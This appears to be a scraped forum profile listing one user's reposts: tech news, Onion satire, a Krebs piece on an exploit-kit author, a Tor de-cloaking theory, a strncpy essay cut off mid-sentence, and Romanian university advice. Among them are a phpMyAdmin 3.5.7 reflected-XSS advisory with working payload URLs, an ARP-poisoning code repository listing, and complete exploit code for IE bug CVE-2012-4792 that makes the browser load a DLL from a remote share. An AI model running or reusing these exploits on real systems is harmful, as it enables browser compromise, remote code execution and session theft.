-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
[h=1]Epic uptime achievement unlocked. Can you beat 16 years?[/h][h=2]NetWare 3.12 server taken down after a decade and a half of duty.[/h] by Peter Bright - Mar 29 2013, 8:55pm GTBST It's September 23, 1996. It's a Monday. The Macarena is pumping out of the office radio, mid-way through its 14 week run at the top of the Billboard Hot 100, doing little to improve the usual Monday gloom. Easing yourself into the week, you idly thumb through a magazine, and read about Windows NT 4.0, released just a couple of months previous. You wonder to yourself whether Microsoft's hot new operating system might finally be worth using. Then it's down to work. Microsoft can keep its fancy GUIs and graphical server operating systems. NetWare 3.12 is where it's at: bulletproof file and print sharing. The server, named INTEL after its process, needs an update, so you install it and reboot. It comes up fine, so you get on with the rest of your day. Enlarge Axatax Sixteen and a half years later, INTEL's hard disks—a pair of full height 5.25 inch 800 MB Quantum SCSI devices—are making some disconcerting noises from their bearings, and you're tired of the complaints. It's time to turn off the old warhorse. Enlarge / It's down. It's probably not coming back up. Axatax Connection Terminated. It seems almost criminal. The server was decommissioned by one of our forum users, Axatax, as documented in this thread. Sixteen and a half years is a long time. Can any of you beat it? Listing image by Axatax Sursa: http://arstechnica.com/information-technology/2013/03/epic-uptime-achievement-can-you-beat-16-years/
-
[h=1]Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus[/h]News • Science & Technology • Internet • ISSUE 49•15 • Apr 9, 2013 Cipher, moments before cracking into the mainframe and declaring, “I’m in.” LOS ANGELES—After dashing off an indiscernible code on his laptop keyboard and sharply striking the enter key multiple times with his forefinger, a fast-talking, visibly tense computer hacker said that he just has to break through the encryption shield before he could upload the nano-virus, sources confirmed Tuesday. The arrogant if socially awkward hacker, a 30-year-old software-programmer-turned-cyberpunk known only as “Cipher,” reportedly told his buttoned-up yet eager employers who were hovering over him and watching his every move that breaking into the supercomputer’s mainframe would be “child’s play.” “The firewall’s a bitch, but I should be able to get around it,” Cipher said before swiftly wheeling his computer chair to an adjacent desk, clearing away the pile of empty pizza boxes and Maxim magazines and scanning the numbers and figures scrolling across two mounted flat-screen monitors. “Oh, what have we here? Looks like they updated their security system. Impressive. But not impressive enough.” “And...I’m in,” he added as the words “ACCESS GRANTED” appeared on his laptop screen. “School’s in session, bitches.” The efficiently executed hacking reportedly began at approximately 6:45 p.m. when Cipher, wearing a tight-fitting black hooded sweatshirt, skintight jeans, and black Converse with no laces, inserted a flash drive into his laptop’s USB port and said “Let the games begin” as an upload bar materialized on the screen. Sources confirmed that over the next few minutes, Cipher industriously navigated between multiple computer monitors displaying 3D-rendered images, criminal profiles, warehouse floor plans, and HTML code before brusquely swinging his chair around. “Don’t touch that!” he reportedly snapped at a client walking past a cluttered table of disassembled technological equipment, which he quickly scooped up in his arms and moved across the room. “This is expensive stuff, okay? Try to do me a favor and not break anything.” “Amateurs,” he added under his breath. When the upload bar reached a completion level of 68 percent, sources confirmed the screen froze and flashed a red message reading “TRANSMISSION ERROR,” causing a female client to ask a slyly grinning Cipher, “Is something wrong?” “They’re smarter than I thought,” Cipher reportedly said while sliding a ballpoint pen between his teeth, brushing aside a wisp of hair from his face, and muttering, “I wonder if I can just bypass the SRM altogether.” “You think you’re a clever boy, don’t you? Well, let’s see how clever you really are.” Reports indicate that after taking a swig from one of the six already opened Red Bulls on his desk, the visibly invigorated hacker quickly entered a series of memorized commands into the computer. Following a tense moment in which the screen appeared to be frozen and Cipher’s clients nervously glanced at each other, the error message disappeared from the screen and the bar resumed uploading, prompting a triumphant and relieved Cipher to bang his desk, slide back from his table on his four-wheeled desk chair, and yell, “Boom.” “Looks like someone forgot to input a certain attack signature file into a certain dynamic-link library. Such a pity,” Cipher said before explaining how he managed to determine the source of the error and improvise a solution, provoking his employers to respond, “In English, please.” “Am I moving too fast for you? You moneymen are all the same.” After deactivating the encryption shield and gaining access to the remote server, sources confirmed that Cipher declared, “Now for the fun part,” and turned up the volume on a nearby stereo. As a heavy metal song blared from the speakers, the hacker reportedly leaned back in his seat, placed his hands behind his head, and waited for the nano-virus to transfer to the computer. “Come on, come to Papa,” said a visibly pleased Cipher as the “Percentage of Virus Uploaded” bar went from 90 to 95, hovered at 99 percent for an uncomfortably long second, and then flipped to 100. “It’s a thing of beauty, my friends. Now, where’s my fucking money?” At press time, sources confirmed this is why Cipher is the best in the business. Sursa: Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus | The Onion - America's Finest News Source
-
Unde-i vulnerabilitatea? Vad doar un link. Se muta la gunoi.
-
[h=1]Dougie's C++ Tutorials[/h] Hello, welcome to my website. I'm Dougie MacLeod. On this website you will find tutorials and information about the C++ programming language. At some point I will create DirectX 9.0 and windows programming tutorials as well. [h=1]Programming Languages[/h] What is a programming language? A programming language is a language that computers understand. To use a programming language, you enter a script of textual instructions to tell a computer what to do. A high level language is a language that is fairly easy for humans to understand. As opposed to low-level languages such as assembly language. Assembly language is difficult for humans to understand, at least at a first glance and it is easier for computers because it is close to binary which is actually all that computers know. There are many computer programming languages. Languages that I know something about are Java, PHP, Visual Basic and C++. And how could I forget Game Maker?, game maker language(gml). I have been consistently programming for over 5 years and I have picked up knowledge about these languages as I have been developing various modules and applications. I have come to the point where I am very much sticking to C++ because it is games I want to create and I don't have confidence that I can make something decent with other languages. http://www.normanslaw.com/dougie/index.php
-
CTRL + F , "hacker", "Phrase not found" Mass-media e pe drumul cel bun.
-
Abordarea e stupida. Acele click-uri intr-o pagina web fac REQUEST-uri HTTP. Tu trebuie de fapt sa faci un program care face acele request-uri. In fine, pe subiect, daca tie iti place sa te complici... Ai functia asta: mouse_event function (Windows) sau functia mai "noua": SendInput function (Windows) care e mai profi dar ceva mai greu de folosit. Ca sa gasesti unde sa dai click, va trebui sa parcurgi probabil DOM-ul HTML, ceea ce cred ca e usor daca folosesti ActiveX-ul de la Internet Explorer, gasesti coordonatele in browser (top si left) si calculezi in functie de pozitia acelui <frame> al tau de Internet Explorer.
-
[h=1]SSH Cracking Backtrack 5 Video Tutorial[/h] SSH is a network protocol which allows you to connect the remote computer securely, SSH is just like telnet but telnet is not secure while SSH is a secure channel for communication. We have already discussed SSH before and in this tutorial I will show you how to crack a SSH to get the password because if you know the username and password then it is very for an attacker to get the remote shell of the victim. SSH security is very important because web administrator used to connect their web admin panel via SSH, people are using SSH to transfer the files. The communication might be client to client and client to server. In this tutorial I will show you how to crack the SSH and to get access on the Linux machine, the tools: Backtrack 5 R1 Hydra (THC Hydra) Mind Enjoy the video and do not forget to share it ! Spread the knowldege to get some knowledge. Sursa: SSH Cracking Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security
-
phpMyAdmin 3.5.7 Cross Site Scripting Authored by Janek Vind aka waraxe | Site waraxe.us phpMyAdmin version 3.5.7 suffers from a reflective cross site scripting vulnerability. [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7 =============================================================================== Author: Janek Vind "waraxe" Date: 09. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-102.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable. ############################################################################### 1. Reflected XSS in "tbl_gis_visualization.php" ############################################################################### Reason: 1. insufficient sanitization of html output Attack vectors: 1. user-supplied parameters "visualizationSettings[width]" and "visualizationSettings[height]" Preconditions: 1. valid session 2. "token" parameter must be known 3. valid database name must be known Php script "tbl_gis_visualization.php" line 51: ------------------------[ source code start ]---------------------------------- // Get settings if any posted $visualizationSettings = array(); if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) { $visualizationSettings = $_REQUEST['visualizationSettings']; .. <legend><?php echo __('Display GIS Visualization'); ?></legend> <div id="placeholder" style="width:<?php echo($visualizationSettings['width']); ?>px; height:<?php echo($visualizationSettings['height']); ?>px;"> ------------------------[ source code end ]------------------------------------ Tests (parameters "db" and "token" must be valid): http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb& visualizationSettings[width]="><script>alert(123);</script> http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb &visualizationSettings[height]="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 31.03.2013 -> Sent email to developers 31.03.2013 -> First response email from developers 02.04.2013 -> Second email from developers - XSS patched in Git repository 03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released 08.04.2013 -> phpMyAdmin 3.5.8 is released 09.04.2013 -> public advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: phpMyAdmin 3.5.7 Cross Site Scripting ? Packet Storm
-
Phoenix Exploit Kit Author Arrested In Russia? The creator of a popular crimeware package known as the Phoenix Exploit Kit was arrested in his native Russia for distributing malicious software and for illegally possessing multiple firearms, according to underground forum posts from the malware author himself. The last version of the Phoenix Exploit Kit. Source: Xylibox.com The Phoenix Exploit Kit is a commercial crimeware tool that until fairly recently was sold by its maker in the underground for a base price of $2,200. It is designed to booby-trap hacked and malicious Web sites so that they foist drive-by downloads on visitors. Like other exploit packs, Phoenix probes the visitor’s browser for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader. If the visitor is unlucky enough to have fallen behind in applying updates, the exploit kit will silently install malware of the attacker’s choosing on the victim’s PC (Phoenix targets only Microsoft Windows computers). The author of Phoenix — a hacker who uses the nickname AlexUdakov on several forums — does not appear to have been overly concerned about covering his tracks or hiding his identity. And as we’ll see in a moment, his online persona has been all-too-willing to discuss his current legal situation with former clients and fellow underground denizens. Exploit.in forum member AlexUdakov selling his Phoenix Exploit Kit. For example, AlexUdakov was a member of Darkode.com, a fairly exclusive English-language cybercrime forum that I profiled last week. That post revealed that the administrator accounts for Darkode had been compromised in a recent break-in, and that the intruders were able to gain access to private communications of the administrators. That access included authority to view full profiles of Darkode members, as well as the private email addresses of Darkode members. AlexUdakov registered at Darkode using the address “nrew89@gmail.com”. That email is tied to a profile at Vkontakte.ru (a Russian version of Facebook) for one Andrey Alexandrov, a 23-year-old male (born May 20, 1989) from Yoshkar-Ola, a historic city of about a quarter-million residents situated on the banks of the Malaya Kokshaga river in Russia, about 450 miles east of Moscow. AKS-74u rifles. Source: Wikimedia Commons. That nrew89@gmail.com address also is connected to accounts at several Russian-language forums and Web sites dedicated to discussing guns, including talk.guns.ru and popgun.ru. This is interesting because, as I was searching AlexUdakov’s Phoenix Exploit kit sales postings on various cybercrime forums, I came across him discussing guns on one of his sales threads at exploit.in, a semi-exclusive underground forum. There, a user with the nickname AlexUdakov had been selling Phoenix Exploit Kit for many months, until around July 2012, when customers on exploit.in began complaining that he was no longer responding to sales and support requests. Meanwhile, AlexUdakov account remained silent for many months. Then, in February 2013, AlexUdakov began posting again, explaining his absence by detailing his arrest by the Federal Security Service (FSB), the Russian equivalent of the FBI. The Phoenix Exploit Kit author explained that he was arrested by FSB officers for distributing malware and the illegal possession of firearms, including two AKS-74U assault rifles, a Glock, a TT (Russian-made pistol), and a PM (also known as a Makarov). In his exploit.in post, AlexUdakov says he lives in a flat with his wife and child. The main portion of the post reads, in part: “On _th of May FSB operative performed a controlled purchase, the money was transferred through WebMoney. 1_ th of July FSB operatives arrested me and conducted searches at the residence, registered address, in the cars that I was using. All computers and storage devices were taken except for… a Wi-Fi router. During the search at the place of residence thy have also taken 2 automatic machine guns AKS74U, Glock, TT handgun, PM Handgun, ammo. I have no criminal record and gave a confession, was released on my own recognizance. I am indicted on 3 charges – conspiracy to distribute malicious software (article 273 of Russian Penal Code), unlawful production of firearms, ammo an explosives (article 223), unlawful possession of weapons, ammo and explosives (article 222)….. …Then there were few months of waiting, and the computer forensic examination took place which attempted to declare the exploit pack to be malware. The examination took place in _Labs, the same place that gave preliminary opinion, which in turn became the basis for opening a criminal case. The examination determined the software (exploit pack) to be malware.” After stumbling on AlexUdakov’s exploit.in thread, I scoured the various hacked forum and affiliate databases I’ve collected over the years. Turns out that a miscreant who adopted the nickname AlexUdakov also was an affiliate of Baka Software, a moneymaking pay-per-install scheme that pushed fake antivirus or “scareware” programs between 2008 and 2009. AlexUdakov registered with Baka using the email address andrey89@nextmail.ru. That email was connected to yet another Vkontakte profile (now banned by Vkontakte for abuse violations), also from Yoshkar-Ola. At this point in the investigation, I called upon a trusted source of mine who has the ability to look up tax records on Russian citizens and businesses, and asked this source if there was a 23-year-old male in Yoshkar-Ola who fit the name in the Vkontakte profile registered to nrew89@gmail.com. A profile photo from the Vkontakte page of Andrey A. Alexandrov The source came back with just one hit: one Andrey Anatolevich Alexandrov, born May 20, 1989, and currently living in a 365-square foot apartment with his wife and small child in Yoshkar-Ola. According to my source, Alexandrov is currently the registered driver of two automobiles, a Lexus RS350 and a 1995 VAZ-2109, a Russian-made hatchback. I can’t say for certain whether the Phoenix Exploit Kit has anything to do with Mr. Alexandrov from Yoshkar-Ola, or indeed whether this young man ever received a visit from the FSB. Requests for comment sent to both emails mentioned in this story went unanswered. And it is certainly possible that the AlexUdakov persona who sold his crimeware package on so many underground forums simply assumed the real-life identity of an innocent man. But based on previous investigations such as this one, it would not be a stretch to conclude that the two identities are one and the same. Readers of this blog sometimes have trouble believing that people involved in selling and distributing malware and crimeware would be so careless about separating their online selves from their real lives. The reality is that many top players in this space consistently show that, although they may posses fairly advanced offensive hacking skills, they are not so expert at defense. This general lack of operational security could be the result of several factors. First, many involved in cybercrime may believe (perhaps rightly so) that it is unlikely that authorities in their countries will ever take an interest in their activities. Also, some fraudsters even like to boast about their crimes, and probably some cybercrooks simply don’t view what they do as serious criminal activity, and thus see little reason to hide. But far more common is the bright kid who is gradually pulled into the darker side of the Underweb, and who almost invariably leaves behind a cumulative trail of clues that point to his real-life identity — all because he never expected to achieve success or make serious money from his illicit activities. I’d like to add a special note of thanks to “Filosov” and Aleksey for their help with the Russian-to-English translations in this post. Sursa: Phoenix Exploit Kit Author Arrested In Russia? — Krebs on Security
-
[h=2]Licente gratuite pentru 10 Programe : Securitate[/h]by Windows Blog România (Notes) on Sunday, April 7, 2013 Am decis sa alcatuim saptamanal cate o lista cu ultimele promotii pentru 10 programe. Si vom incepe cu ceea ce este mai folositor, Securitatea! BitDefender Total Security 2013 – 90 de zile licenta GRATUITA –http://www.downloadcrew.com/article/27729-bitdefender_total_security Norton Antivirus 2013 – 6 luni licenta GRATUITA –http://www.faravirusi.com/2013/01/30/norton-antivirus-2013-6-luni-licenta-gratuita-2/ Kaspersky Internet Security 2013 – 90 de zile licenta GRATUITA –http://www.faravirusi.com/2013/02/13/kaspersky-internet-security-2013-90-de-zile-licenta-gratuita-2/ Hard Disk Sentinel Standard Edition – licenta GRATUITA pe viata –http://www.faravirusi.com/2013/04/05/hard-disk-sentinel-standard-edition-licenta-gratuita-pe-viata/ Panda Internet Security 2013 – 6 luni de zile licenta GRATUITA –http://www.faravirusi.com/2013/02/19/panda-internet-security-2013-6-luni-de-zile-licenta-gratuita-2/ Panda Antivirus Pro 2013 – licenta GRATUITA 6 luni de zile –Panda Antivirus Pro 2013 – licenta GRATUITA 6 luni de zile Ashampoo WinOptimizer 2013 – licenta GRATUITA –http://www.faravirusi.com/2013/01/30/ashampoo-winoptimizer-2013-licenta-gratuita/ McAfee Internet Security 2013 – 6 luni licenta GRATUITA –McAfee Internet Security 2013 – 6 luni licenta GRATUITA Panda Cloud Antivirus Pro – licenta GRATUITA –Panda Cloud Antivirus Pro – licenta GRATUITA Kaspersky PURE Total Security – licenta gratuita 6 luni –Kaspersky PURE Total Security – licenta gratuita 6 luni Via: https://www.facebook.com/notes/windows-blog-rom%C3%A2nia/licente-gratuite-pentru-10-programe-securitate/431115803642587
-
1. Eu sunt la info, diferenta e ca la mate faci aproape numai mate si nimic util (sunt de parere ca matematica e inutila). Recomand categoric informatica. 2. E un fel de ordine a cat de simple sunt lucrurile: la ASE e cel mai lejer si e plin de bagaboante, nu esti stresat insa nu inveti nici foarte multe, la universitate e undeva pe la mijloc, te chinui putin pe la examene dar inveti cate ceva, desi iti baga pe gat chestii naspa, la Poli e naspa, ai probabil o zi in care ai 12 ore, prezenta pe la facultate e aproape obligatorie, am inteles ca examenele se iau greu, de mentionat ca inveti mai mult "electronica" si mai putina programare decat la universitate 3. La toate facultatile se predau in detaliu materiile, daca esti atent si iti place, o sa mergi spre titlul de "avansat" in acel domeniu, in special daca lucrezi "extra" la diverse proiecte sau mai stiu eu ce. De exemplu, la C++, o sa inveti o gramada de chestii minore de care te poti lovi desi te gandesti ca nu o sa te ajute cu nimic, eu m-am intalnit cu multe astfel de lucruri. 4. E mai mult fitza sa intri la cu taxa, sa nu iti faci griji ca "treci la cu taxa"... Nu vad rostul in a plati acea taxa, in special pentru ca sunt de parere ca nu se merita. Putina mate si putina info si ai toate sansele sa intri, cand am intrat eu s-a intrat cu 5 la universitate. 5. O sa faci si aici C/C++, Java, PHP, Ruby, HTML/CSS/Javascript, ASP, Oracle. Sunt multe lucruri utile pe care le poti invata, e mai nasol ca trebuie sa treci si examene ca "tehnici de simulare" si "exuatii diferentiale" si alte porcarii la care am restante si nu le vad rostul. 6. Nu ai nevoie de fotoliu, cafea/bere si femeie langa tine pentru a invata. Acele bucati de lemn sunt de ajuns, nu asta e important, importanti sunt profesorii si inca sunt cativa profesori care vor de la studenti sa invete si ii ajuta cum pot. Sigur, este si Cazanescu care trebuia sa se pensioneze de 360 de ani, insa trebuie sa traga si el niste bani de undeva... 7. La camin o sa coste cam 100-120 RON pe luna, ceea ce nu e deloc mult, mai ales ca nu mai platesti si intretinere. Sigur, o sa platesti netu, dar nu cred ca asta e o problema. Conditiile difera de la camin la camin, exista caminul A1 care arata ca un hotel de lux cu interior foarte ok, caminele din Grozavesti sunt misto, depinde ce pretentii are fiecare. Eu am stat un an la camin si cred ca a fost cel mai frumos an din viata mea. Ca student consider ca trebuie sa stai cel putin un an la camin. Eu initial dadusem la ATM (Academia Tehnica Militara), insa cum matematica si fizica nu sunt punctele mele forte am picat desigur examenele scrise. Universitatea era a doua optiune, insa nu imi pare deloc rau ca am intrat. Nu sunt multumit de facultate din motive personale, consider ca se poate mult mai bine, insa daca ar fi sa aleg din nou, probabil tot la Universitate as veni. Bine, master-ul probabil o sa il fac la bagaboante la ASE. Daca mai ai intrebari, posteaza aici, si o sa raspund.
-
Hai ma ca te ajut eu cu aia
-
// Ai luat-o de pe Facebook?
-
Vezi ca mai sunt discutii pe aceasta tema, s-ar putea sa gasesti lucruri utile pe acolo. Salile sunt ultra-moderne, proiectoare touch-screen, wii si xbox-uri pentru elevii din spate care se plictisesc, tarfe in bai pentru baietii care vor o muie... Scuze, eram ironic pentru ca sunt la porcaria aia de facultate si e cam nasoala. E undeva intre Poli si ASE. Va sa zica se face mai multa programare, adica o sa faci C, C++, Java, Linux, Ruby sau PHP, mai multe, sunt cateva chestii utile, dar sunt si multe porcarii. O sa ti se toarne matematica pe gat: algebra, analiza, ecuatii diferentiale si cine stie ce materii ale caror nume l-am uitat. Facultatea arata putin deplorabil, dar ai noroc, e vara. Iarna insa e posibil sa trebuiasca sa stai cu cojocul pe tine. Bancile nu sunt tocmai "pufoase", iar conditiile nu sunt tocmai excelente. Exista insa si profesori buni. Exista si Cazanescu si alti profi pe care o sa te juri ca ii bati. Dar cred ca asa e peste tot. Daca vrei mai multe informatii pune niste intrebari exacte si am sa incerc sa raspund, din punctul meu de vedere.
-
[h=1]Tor Hidden-Service Passive De-Cloaking[/h] April 3, 2013 By Robert Hansen Someone recently asked me if I knew how to find where Tor-hidden services were really hosted. I identified a few possible methods for finding the origin servers, but none of them worked universally – or even in most situations. Eventually, I did find one way to definitively locate an origin server. However, that method is not trivial – and is still just theoretical. First, I found the following entry on Tor’s webpage: “If your computer isn’t online all the time, your hidden service won’t be either. This leaks information to an observant adversary.” The following idea then came to mind: Let’s say you have a small army of bots (probably a dozen or so are necessary for the sake of redundancy; basically, the more bots you use, the better) connected to Tor. You’d then need to feed something – like the Internet Health Report – into a central database that the de-cloaking bots can monitor. Because the Internet can be flaky and regularly has minor outages – sometimes related to routing, and sometimes related to a simple lack of power * it’s easy (if you have time) to determine if an outage is the cause of a problem, even on robust cloud infrastructures. Furthermore, some companies (e.g., Keynote) already specialize in tracking outages for you. [h=1]De-Cloaking[/h] De-cloaking begins with a few of your robots doing regular polling to make sure your service remains online. This polling is essential for performing tests. When you do discover an outage on the Internet, you should immediately have your robots * from Tor nodes around the world * attempt to contact the server in question. If just a few of the bots are blocked, it’s likely that they are either just transiting the “broken” network or that the bot is itself on this “broken” network. Detecting a broken link that doesn’t give away the origin (click to enlarge). However, if none of your bots can reach the service in question, there’s a good chance that you’ve found the part of the Internet that’s currently broken. One caveat is that if all of the Introducer nodes lie beyond the path of the disruption it may give a false positive, but this is unlikely unless the outage is extremely close to where the polling robots are, or the outage is extremely large. So false positives are a real possibility, although not enough of a deterrent to make this attack un-viable. Detecting an outage that does give away the origin (click to enlarge). This same “contact the server in question” technique can reveal other additional granular/smaller breakages by monitoring for outages within a specific network, then monitoring down to the data center, and possibly even down to the subnet. At the subnet level you’re monitoring a small enough set of machines that one could * at least theoretically * cause selective minor outages (even a few seconds could do the trick) by using a wide variety of denial-of-service attacks to find the one machine that, when attacked, also makes your bots unable to access the site at exactly the same time the site you are monitoring becomes unresponsive. Alternatively, if the IP range is small enough, a government agency could simply watch the wire for Tor traffic. That method, however, is painstaking and requires physical interception, and may require a lot of traffic analysis. However, this method could work. Theoretically, you also could speed up the de-cloaking by looking at the date stamp in the HTTP response of the hidden service. If that service is listening on port 80, you could simply check the dates and then ignore the ones that fail to match the correct time zone/clock skew. Then, unless the problem is deliberate tampering, you’d almost certainly * and much more quickly * know what’s causing the outages. That is, unless the hidden services are within a VM that fails to use NTP (network time protocol), while the parent does use NTP, or unless both dates were set by hand. Overall, using a time-stamp to improve de-cloaking is risky, because it could also be a ‘red herring’ – a tricky method used by a hidden Tor service administrator to hide the service further. A similar technique has been discussed before using clock skews of each Tor node and validating that it matches the Tor hidden service to find the origin server. But using clock skews or time-stamps assumes that the hidden service is not within a VM on the host machine, which is a real possibility; therefore, this may not always work. The concept of a Tor hidden service using multiple machines with the same Tor private key to create a “load balancing” effect to thwart this de-cloaking attack has two issues. The first is that apparently in practice the failover effect can take hours, not seconds. The second is that depending on how the data is mirrored between the two hidden services, it may be extremely easy to tell which server you are communicating with. If something like rsync is used in favor of NFS to mirror content, the inodes on disc and timestamps will be different, leading to different eTag fingerprints and different Last-Modified time stamps, which can be discerned simply by looking at the HTTP headers. Admittedly, what I’m describing here is just a theoretical attack. A large part of this attack is simply passive recon tied in with some generic polling techniques. However, that is a minor barrier for determined adversaries. This is an attack method that could make it significantly more difficult to perfectly hide a Tor-hidden service from a sophisticated adversary using today’s technology without significant forethought or planning. Therefore, it is probably unwise * without taking additional precautions * to run a Tor-hidden service that relies entirely on IP anonymity for safety. A huge thanks to Tom Ritter, Runa Sandvik, Tim Tomes and Robert Graham for letting me bounce these thoughts off of them. Sursa: Tor Hidden-Service Passive De-Cloaking | WhiteHat Security Blog
-
WinPcapExamples Added ARP Poisoning source v 0.1 rubenunteregger [TABLE=class: tree-browser css-truncate] [TR] [TD=class: icon][/TD] [TD=class: content]ARPPing[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Added ARP Poisoning source v 0.1 [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]BasicSniffer[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]CreateFilter[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]EmployeeOfTheMonth[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]FilterARPReplies[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]ListInterfaces[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]LocalNetAdapterConfig[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]ParseARPReplies[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]ParsePackets[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Initialisation [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]Poisoning[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Added ARP Poisoning source v 0.1 [rubenunteregger] [/TD] [/TR] [TR] [TD=class: icon] [/TD] [TD=class: content]WinPcapExamples[/TD] [TD=class: age]2 months ago[/TD] [TD=class: message] Added ARP Poisoning source v 0.1 [rubenunteregger] [/TD] [/TR] [/TABLE] https://github.com/rubenunteregger/WinPcapExamples
-
[h=1]CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT[/h] <!doctype html> <html> <head> <script> // CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013 // Effective in 32-bit IE on x64 Windows // Will load \\192.168.59.128\x\x.dll // https://twitter.com/tombkeeper function GIFT() { var e0 = null; var e1 = null; var e2 = null; try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" + "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" + "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" + "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" + "\u006c\u006c\u002e\u0064\u006c\u006c"; } </script> </head> <body onload="eval(GIFT())"> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html> Sursa: CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" - Pastebin.com
-
Stop using strncpy already! Posted on April 3, 2013 by brucedawson I keep running into code that uses strcpy, sprintf, strncpy, _snprintf (Microsoft only), wcsncpy, swprintf, and morally equivalent functions. Please stop. There are alternatives which are far safer, and they actually require less typing. The dangers of strcpy and sprintf should require little explanation I hope. Neither function lets you specify the size of the output buffer so buffer overruns are often a risk. Using strcpy to copy data from network packets or to copy a large array into a smaller one are particularly dangerous, but even when you’re certain that the string will fit, it’s really not worth the risk. ‘n’ functions considered dangerous The dangers of strncpy, _snprintf, and wcsncpy should be equally well known, but apparently they are not. These functions let you specify the size of the buffer but – and this is really important – they do not guarantee null-termination. If you ask these functions to write more characters than will fill the buffer then they will stop – thus avoiding the buffer overrun – but they will not null-terminate the buffer. In order to use these functions correctly you have to do this sort of nonsense. [INDENT]char buffer[5]; strncpy(buffer, “Thisisalongstring”, sizeof(buffer)); buffer[sizeof(buffer)-1] = 0; [/INDENT] A non-terminated string in C/C++ is a time-bomb just waiting to destroy your code. My understanding is that strncpy was designed for inserting text into the middle of strings, and then was repurposed for ‘secure’ coding even though it is a terrible fit. Meanwhile _snprintf followed the strncpy pattern, but snprintf did not. That is, snprintf guarantees null-termination, but strncpy and _snprintf do not. Is it any wonder that developers get confused? Is it any wonder that developers often do this: [INDENT]// Make snprintf available on Windows: // Don’t ever do this! These two functions are different! #define snprintf _snprintf [/INDENT] strlcpy and lstrcpy strlcpy is designed to solve the null-termination problems – it always null-terminates. It’s certainly an improvement over strncpy, however it isn’t natively available in VC++. lstrcpy is a similarly named Microsoft design defect that appears to behave like strlcpy but is actually a security bug. It uses structured exception handling to catch access violations and then return, so in some situations it will cover up crashes and give you a non-terminated buffer. Awesome. Wide characters worse? swprintf is a function that defies prediction. It lacks an ‘n’ in its name but it takes a character count, however it doesn’t guarantee null-termination. It’s enough to make one’s head explode. Where’s the pattern? If you find the list below obvious or easy to remember then you may be a prodigy, or a liar: May overrun the buffer: strcpy, sprintf Sometimes null-terminates: strncpy, _snprintf, swprintf, wcsncpy, lstrcpy Always null-terminates: snprintf, strlcpy The documentation for these functions (man pages, MSDN) is typically pretty weak. I want bold letters at the top telling me whether it will null-terminate, but it typically takes a lot of very careful reading to be sure. It’s usually faster to write a test program. It’s also worth emphasizing that of the seven functions listed above only one is even plausibly safe to use. And it’s not great either. More typing means more errors But wait, it’s actually worse. Because it turns out that programmers are imperfect human beings, and therefore programmers sometimes pass the wrong buffer size. Not often – probably not much more than one percent of the time – but these mistakes definitely happen, and ‘being careful’ doesn’t actually 